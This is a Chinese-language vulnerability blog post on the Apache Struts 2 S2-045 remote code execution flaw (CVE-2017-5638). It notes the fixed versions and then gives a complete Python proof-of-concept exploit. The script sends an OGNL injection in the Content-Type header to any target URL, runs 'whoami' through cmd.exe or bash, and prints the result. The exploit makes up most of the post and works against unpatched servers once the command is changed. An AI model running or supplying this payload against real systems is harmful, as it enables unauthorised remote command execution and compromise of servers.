1. 首页
  2. 漏洞笔记, 软件层

Apache Struts 2 S2-045 远程代码执行漏洞 (CVE-2017-5638)

CVE 编号:CVE-2017-5638

 

修复方法:更新至 Struts 2.3.32 或者 Struts 2.5.10.1

 

Poc

pip install poster 根目录建立 tmp.txt

 

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

def poc():
 register_openers()
 datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
 header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
 header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
 request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
 response = urllib2.urlopen(request)
 print response.read()


poc()

 

  • 版权声明:本文基于《知识共享署名-相同方式共享 3.0 中国大陆许可协议》发布,转载请遵循本协议
  • 文章链接:https://secsb.com/bug/145.html [复制] (转载时请注明本文出处及文章链接)
上一篇:
:下一篇

作者:mr.tcsy

介绍:梦生、梦死、

文章:75篇

博客:https://secsb.com
最后更新:17-11-08

发表评论

gravatar

沙发空缺中,还不快抢~